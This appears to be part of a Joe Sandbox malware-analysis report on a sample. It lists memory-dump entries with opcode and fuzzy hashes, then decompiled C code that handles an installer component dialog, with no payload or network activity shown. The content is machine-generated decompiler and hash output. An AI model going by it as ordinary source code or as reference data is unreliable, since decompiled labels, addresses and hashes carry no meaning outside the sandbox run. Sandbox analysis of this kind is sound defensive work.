                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e88c4cb04255811e732db4244c0885cf654573240a3233c88f1363400629203d
                                                                                                                          • Instruction ID: eb76122e83626d786a84c0724d94b90162ff4ae3ec5314ea06cf9048909a7ffe
                                                                                                                          • Opcode Fuzzy Hash: e88c4cb04255811e732db4244c0885cf654573240a3233c88f1363400629203d
                                                                                                                          • Instruction Fuzzy Hash: B2512A75A04749DFDF349F288C547DA37E6BF59350F45062EDC8A9B290C7318A85CB06
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2713ec0d27a3c78414a96311b4ffe3384ac97504cbc010c407985ae4cf280b8f
                                                                                                                          • Instruction ID: 8371bf8b1b99f76b52a41254c23ccd36f62a089688420b27dcca8bf79b208049
                                                                                                                          • Opcode Fuzzy Hash: 2713ec0d27a3c78414a96311b4ffe3384ac97504cbc010c407985ae4cf280b8f
                                                                                                                          • Instruction Fuzzy Hash: E6512971A04749DFDF349F288C947DA77E2BF59350F41062EDC8A9B290C7318A85CB06
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8744ed22a5572dec80ca4ba78fe49eca9679b5365335712fc717f159f9938bed
                                                                                                                          • Instruction ID: 1ec836ab1d75d2508f34b1874d8305a57d5326866e3b70f5c570efbba05d11de
                                                                                                                          • Opcode Fuzzy Hash: 8744ed22a5572dec80ca4ba78fe49eca9679b5365335712fc717f159f9938bed
                                                                                                                          • Instruction Fuzzy Hash: 17512875604799DFCF34DE288C54BDA77E2BF59350F42022EDC8A9F250C7318A868B49
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 331a7e54ca1ea47bcbc3a382fa3cf6f9243cc5b9e3772471462bb2593124f88f
                                                                                                                          • Instruction ID: 6851711a721e53cff704ca62f25d1b2215b336174865dc5eb1f30a81d8bb9b5e
                                                                                                                          • Opcode Fuzzy Hash: 331a7e54ca1ea47bcbc3a382fa3cf6f9243cc5b9e3772471462bb2593124f88f
                                                                                                                          • Instruction Fuzzy Hash: 2C512875604789DFCF349E388C54BDA37E6BF59350F42022EDC8A9F290C7318A858B49
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e914a5b91bd24a77f813ecca9c0424dfc1d453194523ffa59aa8f245653fc507
                                                                                                                          • Instruction ID: 487831993fc19e42a2e23af748e878a3b5e363e1376f08fa6a0de4dafb0a27ee
                                                                                                                          • Opcode Fuzzy Hash: e914a5b91bd24a77f813ecca9c0424dfc1d453194523ffa59aa8f245653fc507
                                                                                                                          • Instruction Fuzzy Hash: 08411771604789DFDF349E388C94BDA3BE6BF59350F42022EDC8A9F290C7318A858B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 29515ee798c43178fa9e6c87a647d6b1ccb025978ba113b2b3aab862d2f37890
                                                                                                                          • Instruction ID: 7037c482086d148c5a63f64c655fb9f168cf4ad99043c19cf1aba4740b0fa621
                                                                                                                          • Opcode Fuzzy Hash: 29515ee798c43178fa9e6c87a647d6b1ccb025978ba113b2b3aab862d2f37890
                                                                                                                          • Instruction Fuzzy Hash: 813169253047458BFB2CEE358DA93EB73E3AF91240F15412ECC4787288E778C5424A16
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e3c78e5f2e6deedb889f20bbe079470ff826baf069cca3e2416508b87c91a6ae
                                                                                                                          • Instruction ID: 822a2a91644279f53416f43173b841c04e16e8c10a7eae3cf6b873d5e74277ce
                                                                                                                          • Opcode Fuzzy Hash: e3c78e5f2e6deedb889f20bbe079470ff826baf069cca3e2416508b87c91a6ae
                                                                                                                          • Instruction Fuzzy Hash: E541BA746047409FCB688F35C8957EEB7A1BF14310F96806FC89A8B221C7308680CF46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 26143cd11007d0aa67ac43d1cf2d0782ba09f4c2e5d32cfa51dbd9140e0abd27
                                                                                                                          • Instruction ID: 416b9427c5852106cafbce520a99f5e9caba39ffc361ff983b80902a7d1e29c6
                                                                                                                          • Opcode Fuzzy Hash: 26143cd11007d0aa67ac43d1cf2d0782ba09f4c2e5d32cfa51dbd9140e0abd27
                                                                                                                          • Instruction Fuzzy Hash: 5331BB746047409FDB689F75C8957EEBBA1FF14310FA6816FC89A8B221C7308684CF46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 94820893956e11a18e2ff83073513078c8fcfa20a0819921e844145c334546e7
                                                                                                                          • Instruction ID: 041b2c5d11ce39e7c8484c59ab2ccc8f0252747cbebd4231a87378b022328b71
                                                                                                                          • Opcode Fuzzy Hash: 94820893956e11a18e2ff83073513078c8fcfa20a0819921e844145c334546e7
                                                                                                                          • Instruction Fuzzy Hash: 6C21237620024A8BDB38DE398E243EB71A7AFE1390FA6416BCD4B5F210D77559438A08
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7d1334074eea2c13eb580d434ce2e4d33717f85442e023fd90ff0635cef2eba7
                                                                                                                          • Instruction ID: 07b80b45c9f04a5dee9c06797e3ff4e745b79b7f719a6d1b386b6b97ce254001
                                                                                                                          • Opcode Fuzzy Hash: 7d1334074eea2c13eb580d434ce2e4d33717f85442e023fd90ff0635cef2eba7
                                                                                                                          • Instruction Fuzzy Hash: 56111575A05794CFCB71DF28C9E8BC6B3A0EB2A700F45846AE9199F351C330E941CB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a447e2b8de9d3f7a236999cdd7dc8e6a7df3856e6af1a0fdd10d89765f332260
                                                                                                                          • Instruction ID: 2f311ce3276eb561336a8c1eb75d859bbc05040bed10d3d7e6a948d3e5dd6e62
                                                                                                                          • Opcode Fuzzy Hash: a447e2b8de9d3f7a236999cdd7dc8e6a7df3856e6af1a0fdd10d89765f332260
                                                                                                                          • Instruction Fuzzy Hash: 4AD0A5F5615251EFD303F7118600BD37379F7439E473149509145D7526E315240E8E95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 466709342748b3835d25d4b3970d47a9436fd4c56f667a3b6a6c8faa73896bb2
                                                                                                                          • Instruction ID: 48f4d2792ee7480e2295d189a6b7c6174982b87d4a477c632ebb4367db834738
                                                                                                                          • Opcode Fuzzy Hash: 466709342748b3835d25d4b3970d47a9436fd4c56f667a3b6a6c8faa73896bb2
                                                                                                                          • Instruction Fuzzy Hash: 43C09236B959408FCE96CA4CC2C0E48B3A3BB84700B425891F862DBB91C224ED40CE88
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                          				struct HWND__* _v8;
                                                                                                                          				struct HWND__* _v12;
                                                                                                                          				long _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				intOrPtr _v28;
                                                                                                                          				signed char* _v32;
                                                                                                                          				int _v36;
                                                                                                                          				signed int _v44;
                                                                                                                          				int _v48;
                                                                                                                          				signed int* _v60;
                                                                                                                          				signed char* _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				long _v72;
                                                                                                                          				void* _v76;
                                                                                                                          				intOrPtr _v80;
                                                                                                                          				intOrPtr _v84;
                                                                                                                          				void* _v88;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				signed int _t198;
                                                                                                                          				intOrPtr _t201;
                                                                                                                          				long _t207;
                                                                                                                          				signed int _t211;
                                                                                                                          				signed int _t222;
                                                                                                                          				void* _t225;
                                                                                                                          				void* _t226;
                                                                                                                          				int _t232;
                                                                                                                          				long _t237;
                                                                                                                          				long _t238;
                                                                                                                          				signed int _t239;
                                                                                                                          				signed int _t245;
                                                                                                                          				signed int _t247;
                                                                                                                          				signed char _t248;
                                                                                                                          				signed char _t254;
                                                                                                                          				void* _t258;
                                                                                                                          				void* _t260;
                                                                                                                          				signed char* _t278;
                                                                                                                          				signed char _t279;
                                                                                                                          				long _t284;
                                                                                                                          				struct HWND__* _t291;
                                                                                                                          				signed int* _t292;
                                                                                                                          				int _t293;
                                                                                                                          				long _t294;
                                                                                                                          				signed int _t295;
                                                                                                                          				void* _t297;
                                                                                                                          				long _t298;
                                                                                                                          				int _t299;
                                                                                                                          				signed int _t300;
                                                                                                                          				signed int _t303;
                                                                                                                          				signed int _t311;
                                                                                                                          				signed char* _t319;
                                                                                                                          				int _t324;
                                                                                                                          				void* _t326;
                                                                                                                          
                                                                                                                          				_t291 = _a4;
                                                                                                                          				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                                                                          				_v8 = GetDlgItem(_t291, 0x408);
                                                                                                                          				_t326 = SendMessageW;
                                                                                                                          				_v24 =  *0x42a288;
                                                                                                                          				_v28 =  *0x42a270 + 0x94;
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					L23:
                                                                                                                          					if(_a8 != 0x405) {
                                                                                                                          						_t301 = _a16;
                                                                                                                          					} else {
                                                                                                                          						_a12 = 0;
                                                                                                                          						_t301 = 1;
                                                                                                                          						_a8 = 0x40f;
                                                                                                                          						_a16 = 1;
                                                                                                                          					}
                                                                                                                          					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                          						_v16 = _t301;
                                                                                                                          						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                                                                          							if(( *0x42a279 & 0x00000002) != 0) {
                                                                                                                          								L41:
                                                                                                                          								if(_v16 != 0) {
                                                                                                                          									_t237 = _v16;
                                                                                                                          									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                                                                          										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                                                                          									}
                                                                                                                          									_t238 = _v16;
                                                                                                                          									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                                                                          										_t301 = _v24;
                                                                                                                          										_t239 =  *(_t238 + 0x5c);
                                                                                                                          										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                                                                          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                                                                          										} else {
                                                                                                                          											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L48;
                                                                                                                          							}
                                                                                                                          							if(_a8 == 0x413) {
                                                                                                                          								L33:
                                                                                                                          								_t301 = 0 | _a8 != 0x00000413;
                                                                                                                          								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                                                                                          								_t295 = _t245;
                                                                                                                          								if(_t295 >= 0) {
                                                                                                                          									_t94 = _v24 + 8; // 0x8
                                                                                                                          									_t301 = _t245 * 0x818 + _t94;
                                                                                                                          									_t247 =  *_t301;
                                                                                                                          									if((_t247 & 0x00000010) == 0) {
                                                                                                                          										if((_t247 & 0x00000040) == 0) {
                                                                                                                          											_t248 = _t247 ^ 0x00000001;
                                                                                                                          										} else {
                                                                                                                          											_t254 = _t247 ^ 0x00000080;
                                                                                                                          											if(_t254 >= 0) {
                                                                                                                          												_t248 = _t254 & 0x000000fe;
                                                                                                                          											} else {
                                                                                                                          												_t248 = _t254 | 0x00000001;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										 *_t301 = _t248;
                                                                                                                          										E0040117D(_t295);
                                                                                                                          										_a12 = _t295 + 1;
                                                                                                                          										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                                                                                          										_a8 = 0x40f;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L41;
                                                                                                                          							}
                                                                                                                          							_t301 = _a16;
                                                                                                                          							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                          								goto L41;
                                                                                                                          							}
                                                                                                                          							goto L33;
                                                                                                                          						} else {
                                                                                                                          							goto L48;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						L48:
                                                                                                                          						if(_a8 != 0x111) {
                                                                                                                          							L56:
                                                                                                                          							if(_a8 == 0x200) {
                                                                                                                          								SendMessageW(_v8, 0x200, 0, 0);
                                                                                                                          							}
                                                                                                                          							if(_a8 == 0x40b) {
                                                                                                                          								_t225 =  *0x42372c;
                                                                                                                          								if(_t225 != 0) {
                                                                                                                          									ImageList_Destroy(_t225);
                                                                                                                          								}
                                                                                                                          								_t226 =  *0x423740;
                                                                                                                          								if(_t226 != 0) {
                                                                                                                          									GlobalFree(_t226);
                                                                                                                          								}
                                                                                                                          								 *0x42372c = 0;
                                                                                                                          								 *0x423740 = 0;
                                                                                                                          								 *0x42a2c0 = 0;
                                                                                                                          							}
                                                                                                                          							if(_a8 != 0x40f) {
                                                                                                                          								L90:
                                                                                                                          								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                                                                                          									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                                                                          									ShowWindow(_v8, _t324);
                                                                                                                          									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                                                                          								}
                                                                                                                          								goto L93;
                                                                                                                          							} else {
                                                                                                                          								E004011EF(_t301, 0, 0);
                                                                                                                          								_t198 = _a12;
                                                                                                                          								if(_t198 != 0) {
                                                                                                                          									if(_t198 != 0xffffffff) {
                                                                                                                          										_t198 = _t198 - 1;
                                                                                                                          									}
                                                                                                                          									_push(_t198);
                                                                                                                          									_push(8);
                                                                                                                          									E00404FFF();
                                                                                                                          								}
                                                                                                                          								if(_a16 == 0) {
                                                                                                                          									L75:
                                                                                                                          									E004011EF(_t301, 0, 0);
                                                                                                                          									_v36 =  *0x423740;
                                                                                                                          									_t201 =  *0x42a288;
                                                                                                                          									_v64 = 0xf030;
                                                                                                                          									_v24 = 0;
                                                                                                                          									if( *0x42a28c <= 0) {
                                                                                                                          										L86:
                                                                                                                          										if( *0x42a31e == 0x400) {
                                                                                                                          											InvalidateRect(_v8, 0, 1);
                                                                                                                          										}
                                                                                                                          										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                                                                                          											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                                                                                          										}
                                                                                                                          										goto L90;
                                                                                                                          									}
                                                                                                                          									_t292 = _t201 + 8;
                                                                                                                          									do {
                                                                                                                          										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                                                          										if(_t207 != 0) {
                                                                                                                          											_t303 =  *_t292;
                                                                                                                          											_v72 = _t207;
                                                                                                                          											_v76 = 8;
                                                                                                                          											if((_t303 & 0x00000001) != 0) {
                                                                                                                          												_v76 = 9;
                                                                                                                          												_v60 =  &(_t292[4]);
                                                                                                                          												_t292[0] = _t292[0] & 0x000000fe;
                                                                                                                          											}
                                                                                                                          											if((_t303 & 0x00000040) == 0) {
                                                                                                                          												_t211 = (_t303 & 0x00000001) + 1;
                                                                                                                          												if((_t303 & 0x00000010) != 0) {
                                                                                                                          													_t211 = _t211 + 3;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												_t211 = 3;
                                                                                                                          											}
                                                                                                                          											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                                                                          											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                                                          											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                                                          										}
                                                                                                                          										_v24 = _v24 + 1;
                                                                                                                          										_t292 =  &(_t292[0x206]);
                                                                                                                          									} while (_v24 <  *0x42a28c);
                                                                                                                          									goto L86;
                                                                                                                          								} else {
                                                                                                                          									_t293 = E004012E2( *0x423740);
                                                                                                                          									E00401299(_t293);
                                                                                                                          									_t222 = 0;
                                                                                                                          									_t301 = 0;
                                                                                                                          									if(_t293 <= 0) {
                                                                                                                          										L74:
                                                                                                                          										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                                                                          										_a16 = _t293;
                                                                                                                          										_a8 = 0x420;
                                                                                                                          										goto L75;
                                                                                                                          									} else {
                                                                                                                          										goto L71;
                                                                                                                          									}
                                                                                                                          									do {
                                                                                                                          										L71:
                                                                                                                          										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                                                                          											_t301 = _t301 + 1;
                                                                                                                          										}
                                                                                                                          										_t222 = _t222 + 1;
                                                                                                                          									} while (_t222 < _t293);
                                                                                                                          									goto L74;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                                          							goto L93;
                                                                                                                          						} else {
                                                                                                                          							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                                                          							if(_t232 == 0xffffffff) {
                                                                                                                          								goto L93;
                                                                                                                          							}
                                                                                                                          							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                                                                          							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                                                                          								_t294 = 0x20;
                                                                                                                          							}
                                                                                                                          							E00401299(_t294);
                                                                                                                          							SendMessageW(_a4, 0x420, 0, _t294);
                                                                                                                          							_a12 = _a12 | 0xffffffff;
                                                                                                                          							_a16 = 0;
                                                                                                                          							_a8 = 0x40f;
                                                                                                                          							goto L56;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_v36 = 0;
                                                                                                                          					_v20 = 2;
                                                                                                                          					 *0x42a2c0 = _t291;
                                                                                                                          					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                                                                                          					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                                                                                          					 *0x423734 =  *0x423734 | 0xffffffff;
                                                                                                                          					_t297 = _t258;
                                                                                                                          					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                                                                                          					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                                          					 *0x42372c = _t260;
                                                                                                                          					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                                                                          					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                                                                                          					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                                          						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                                                          					}
                                                                                                                          					DeleteObject(_t297);
                                                                                                                          					_t298 = 0;
                                                                                                                          					do {
                                                                                                                          						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                                                                          						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                                                                          							if(_t298 != 0x20) {
                                                                                                                          								_v20 = 0;
                                                                                                                          							}
                                                                                                                          							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                                                                                          						}
                                                                                                                          						_t298 = _t298 + 1;
                                                                                                                          					} while (_t298 < 0x21);
                                                                                                                          					_t299 = _a16;
                                                                                                                          					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                                                                          					_push(0x15);
                                                                                                                          					E004045C4(_a4);
                                                                                                                          					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                                                                          					_push(0x16);
                                                                                                                          					E004045C4(_a4);
                                                                                                                          					_t300 = 0;
                                                                                                                          					_v16 = 0;
                                                                                                                          					if( *0x42a28c <= 0) {
                                                                                                                          						L19:
                                                                                                                          						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                                          						goto L20;
                                                                                                                          					} else {
                                                                                                                          						_t319 = _v24 + 8;
                                                                                                                          						_v32 = _t319;
                                                                                                                          						do {
                                                                                                                          							_t278 =  &(_t319[0x10]);
                                                                                                                          							if( *_t278 != 0) {
                                                                                                                          								_v64 = _t278;
                                                                                                                          								_t279 =  *_t319;
                                                                                                                          								_v88 = _v16;
                                                                                                                          								_t311 = 0x20;
                                                                                                                          								_v84 = 0xffff0002;
                                                                                                                          								_v80 = 0xd;
                                                                                                                          								_v68 = _t311;
                                                                                                                          								_v44 = _t300;
                                                                                                                          								_v72 = _t279 & _t311;
                                                                                                                          								if((_t279 & 0x00000002) == 0) {
                                                                                                                          									if((_t279 & 0x00000004) == 0) {
                                                                                                                          										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                                                          									} else {
                                                                                                                          										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									_v80 = 0x4d;
                                                                                                                          									_v48 = 1;
                                                                                                                          									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                                                          									_v36 = 1;
                                                                                                                          									 *( *0x423740 + _t300 * 4) = _t284;
                                                                                                                          									_v16 =  *( *0x423740 + _t300 * 4);
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t300 = _t300 + 1;
                                                                                                                          							_t319 =  &(_v32[0x818]);
                                                                                                                          							_v32 = _t319;
                                                                                                                          						} while (_t300 <  *0x42a28c);
                                                                                                                          						if(_v36 != 0) {
                                                                                                                          							L20:
                                                                                                                          							if(_v20 != 0) {
                                                                                                                          								E004045F9(_v8);
                                                                                                                          								goto L23;
                                                                                                                          							} else {
                                                                                                                          								ShowWindow(_v12, 5);
                                                                                                                          								E004045F9(_v12);
                                                                                                                          								L93:
                                                                                                                          								return E0040462B(_a8, _a12, _a16);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L19;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}


























































                                                                                                                          0x00405038
                                                                                                                          0x00405051
                                                                                                                          0x00405056
                                                                                                                          0x0040505e
                                                                                                                          0x00405064
                                                                                                                          0x0040507a
                                                                                                                          0x0040507d
                                                                                                                          0x004052a8
                                                                                                                          0x004052af
                                                                                                                          0x004052c3
                                                                                                                          0x004052b1
                                                                                                                          0x004052b3
                                                                                                                          0x004052b6
                                                                                                                          0x004052b7
                                                                                                                          0x004052be
                                                                                                                          0x004052be
                                                                                                                          0x004052cf
                                                                                                                          0x004052dd
                                                                                                                          0x004052e0
                                                                                                                          0x004052f6
                                                                                                                          0x0040536b
                                                                                                                          0x0040536e
                                                                                                                          0x00405370
                                                                                                                          0x0040537a
                                                                                                                          0x00405388
                                                                                                                          0x00405388
                                                                                                                          0x0040538a
                                                                                                                          0x00405394
                                                                                                                          0x0040539a
                                                                                                                          0x0040539d
                                                                                                                          0x004053a0
                                                                                                                          0x004053bb
                                                                                                                          0x004053a2
                                                                                                                          0x004053ac
                                                                                                                          0x004053ac
                                                                                                                          0x004053a0
                                                                                                                          0x00405394
                                                                                                                          0x00000000
                                                                                                                          0x0040536e
                                                                                                                          0x004052fb
                                                                                                                          0x00405306
                                                                                                                          0x0040530b
                                                                                                                          0x00405312
                                                                                                                          0x00405317
                                                                                                                          0x0040531b
                                                                                                                          0x00405326
                                                                                                                          0x00405326
                                                                                                                          0x0040532a
                                                                                                                          0x0040532e
                                                                                                                          0x00405332
                                                                                                                          0x00405345
                                                                                                                          0x00405334
                                                                                                                          0x00405334
                                                                                                                          0x0040533b
                                                                                                                          0x00405341
                                                                                                                          0x0040533d
                                                                                                                          0x0040533d
                                                                                                                          0x0040533d
                                                                                                                          0x0040533b
                                                                                                                          0x00405349
                                                                                                                          0x0040534b
                                                                                                                          0x0040535e
                                                                                                                          0x00405361
                                                                                                                          0x00405364
                                                                                                                          0x00405364
                                                                                                                          0x0040532e
                                                                                                                          0x00000000
                                                                                                                          0x0040531b
                                                                                                                          0x004052fd
                                                                                                                          0x00405304
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004053be
